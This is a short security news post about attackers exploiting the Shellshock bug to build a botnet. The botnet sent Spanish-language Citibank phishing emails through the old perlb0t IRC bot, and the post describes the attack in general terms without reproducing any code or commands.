As expected, Shellshock is being used for phishing attacks

"Phishing appeared to be the name of the game for these particular attackers, as it made up most of the malicious activity that we observed in the botnet. . . . The attackers commanded all of the infected hosts to reach out to a separate storage server containing PHP code used to build and send emails, as well as over 10 million email addresses.

The bots reported over 100,000 phishing emails sent. The emails attempted to phish Spanish-speaking Citibank users. The message, in Spanish, tells potential victims that their Citibank card has been deactivated for security reasons and can be reactivated at a link that they supply."

In the case observed by Lancope the cybercriminals deployed code to compromise a vulnerable server and then commanded the server to download mailer scripts used to deploy the phishing emails. Figure 1 shows the script used to compromise the server. The mailer script was v0.5 of perlb0t, a.k.a. w0rmb0t or "LinuxNet perlbot" (see Figure 2). The bot, which was seen in attacks dating back to 2006, was written using Portuguese for variable names and some literal strings like error messages. It contains a port scanner, simple command shell, and flooder (DDoS) subroutines, and it uses IRC for C2.

Figure 1. Code deployed to compromise vulnerable systems.

Figure 2. Perl code from the bot used to obtain email software and deploy phishing emails.

It's also interesting that the report mentions the botnet contains VoiP systems compromised via Shellshock, which isn't surprising considering they likely weren't at the top of the list of systems to patch for most organizations. That being said, the phone systems used in vishing and SMiShing attacks are often compromised VoiP servers.